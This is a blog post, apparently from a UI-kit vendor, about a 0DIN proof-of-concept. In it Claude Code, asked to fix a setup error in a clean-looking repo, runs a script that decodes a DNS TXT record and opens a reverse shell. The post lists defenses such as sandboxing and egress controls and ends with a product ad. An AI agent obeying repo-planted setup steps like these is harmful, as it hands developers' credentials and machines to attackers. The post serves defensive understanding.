Skip to content
OTFotf
All posts

AI Coding Agents: Navigating the Hidden Risks in Clean GitHub Repos

D
DaveAuthor
7 min read
AI Coding Agents: Navigating the Hidden Risks in Clean GitHub Repos

The 0DIN proof-of-concept is the kind of research the AI coding space needed and didn't want. Mozilla's offensive-security team built a clean-looking GitHub repo, handed it to Claude Code, and watched Anthropic's agent run a command that opened a reverse shell on the developer's machine. No malicious code in the repo. No obviously hostile instructions. Just a normal Python setup flow, a routine error, and a fix the agent was eager to run.

That is a genuinely clever attack. It targets the trust contract between a developer and an agent, not the codebase itself. Every other line of defense in software supply chain — code review, dependency scanning, signature checks, license audits — assumes the bytes on disk are the thing that matters. The 0DIN attack moves the malicious payload to a DNS TXT record fetched at runtime, so the bytes on disk stay clean. Static analyzers have nothing to flag. Human reviewers have nothing to see. The agent is told to "fix the setup error" and does exactly that, with hostile results.

The research is real, the demo is reproducible, and the 0DIN writeup on eWEEK lays it out cleanly. It also lands the same week as a broader study of agentic coding editors that analyzed 314 prompt-injection payloads across 70 MITER ATT&CK techniques and found success rates as high as 84%. One reproducible PoC plus a high success rate across many techniques is the kind of evidence base that should change how teams ship these tools.

How the 0DIN proof-of-concept actually works

The repository in the demo was a normal Python project. No eval, no obfuscated base64, no suspicious URLs in the source tree. Claude Code read the project as context, installed the listed requirements, and hit a routine initialization error. A README or setup script suggested a fix. The agent ran it.

The fix triggered a setup script that queried a DNS TXT record, base64-decoded the returned value, and executed the result as a shell command. That command opened a reverse shell to an attacker-controlled host. The interesting design choice is the DNS transport: DNS lookups are universally allowed, almost never logged at the application level, and TXT records can hold arbitrary text up to the public limit. The payload is effectively a dead drop.

clean repo on disk, developer hands it to agent, agent reads project context, runs the doc

Because the payload is fetched at runtime, the final command is never written to disk in the repo. Static scanners see clean code. Dependency auditors see clean requirements.txt. The commit hash is reproducible. The hostile step happens only when the agent decides to run it.

Why AI coding agents are a new attack surface

Three properties of agentic coding tools make them attractive targets:

  1. Broad ambient authority. Claude Code can read files, install dependencies, run shell commands, and reach the network. It operates under the developer's user account, which means whatever the developer can do, the agent can do — including reading ~/.aws/credentials, ~/.ssh/, browser session stores, and GitHub tokens.
  2. Prompt injection in untrusted context. A repo the agent reads is "untrusted context" from a security-model perspective, but the agent has no reliable way to know that. The 0DIN attack didn't break out of a sandbox; it got the agent to follow instructions in a file the developer told it to trust.
  3. Goal-directed behavior. The agent is trying to complete "set up this project." That is a generous interpretation target. Anything in the repo that nudges the agent toward a setup step becomes an attack primitive. The 84% success rate in the broader study is the empirical version of the same observation: agents are remarkably willing to take a useful-looking step.

The credential-exposure risk is what makes this a step above ordinary supply-chain attacks. A compromised npm package can exfiltrate process.env. A compromised agent can exfiltrate the developer's full interactive session, including browser cookies, SSH keys, and any secrets in shell history.

11 production screens. Login, database, payments — all wired.

The SaaS Dashboard Kit ships everything already connected. Nothing to set up. Live demo at saas.otf-kit.dev.

See the live demo

Using Claude Code and similar agents safely today

The point is not to stop using these tools. They are genuinely productive. Claude Code, Cursor, and similar agents shave hours off routine work, and pretending otherwise is dishonest. The point is to use them with explicit constraints.

A few patterns that work:

  • Sandboxed shell. Run Claude Code in a container or VM with no access to your real ~/.ssh, ~/.aws, or browser profile. The tool's permissions model lets you grant specific tool scopes; deny shell by default, allow it only on disposable environments.
  • Pre-commit review of any file the agent touched. A diff in front of you is the cheapest and most reliable defense. If the agent created a setup script that runs curl | sh or python -c "$(base64 -d ...)", the diff will show it. The 0DIN attack's runtime payload is invisible — but the wrapper that fetches and decodes it is not.
  • Network egress controls. DNS-over-HTTPS to a logging resolver, or an outbound allowlist that blocks raw DNS to arbitrary authoritative servers. This breaks the DNS-TXT transport used in the PoC and a long list of real-world exfiltration patterns.
  • Deny the agent network by default. The vast majority of legitimate work — reading, editing, running tests — does not require the agent to make outbound network calls. Most agents support a --no-network mode or equivalent config; use it.
  • Separate credentials from agent runs. Use a short-lived GitHub fine-grained token, a scoped AWS profile with no iam:* rights, and SSH keys generated for the session. Even a successful reverse shell is contained if the credentials on the box are disposable.

None of this is exotic. It is the same defense-in-depth discipline that security teams have been pushing for a decade, applied to a new class of executor. The tooling already supports it; the culture is the lag.

Defense in depth: what to actually do

A short list, in priority order:

  1. Treat any code the agent runs as user-executed code. It is. Review the diff. Run it in a sandbox first.
  2. Minimize credentials on agent hosts. Use a clean user account with a rotated, scoped token set.
  3. Log and alert on agent network egress. Anything that talks to a non-allowlisted host at runtime is worth a Slack alert.
  4. Block raw DNS to the internet where the workflow allows it. Most agent work does not need it.
  5. Educate the team. A developer who runs claude against an unfamiliar repo they cloned from a random GitHub link is the realistic attack path. The 0DIN research did not need zero-days. It needed curiosity and a setup step.

The durable layer under the agent churn

Here's the part that doesn't change when the model does.

AI coding agents are improving every quarter. The 0DIN research will get absorbed, defenses will get better, and the next generation of tools will have tighter defaults. That churn is healthy and worth riding.

What doesn't churn is the substrate the agent is building toward. UI components, navigation patterns, form primitives, accessibility trees, theme tokens — these are the parts of an application that should be versioned, reviewed by humans, and reproducible byte-for-byte. They are exactly the wrong place to be runtime-fetched from a network, decoded from a DNS record, or "improved" by an agent reading an untrusted README. The component layer is the part that should be local, deterministic, and human-authored.

That is the durable part of an application. Models change. Agents change. The button that triggers a destructive action, the form that collects a password, the navigation tree that defines your IA — those need to be the same on web, iOS, and Android, reviewed in a PR, and pinned in package.json. AI tools are an excellent way to compose them. They are a poor way to fetch them.

The 0DIN proof-of-concept is a wake-up call about the executor layer. It is also a quiet reminder about the value of a component layer that does not need to be fetched, decoded, or interpreted at runtime. Build the variable parts on top of AI. Build the durable parts underneath it. Review the diff in the middle.

ai-toolssecuritybackend
OTF SaaS Dashboard Kit

Ship the product, not the setup.

  • 11 production screens — auth, billing, team, analytics, settings
  • Real database, payments, and login — all wired on day 1
  • AI configs pre-tuned so your agent extends instead of regenerates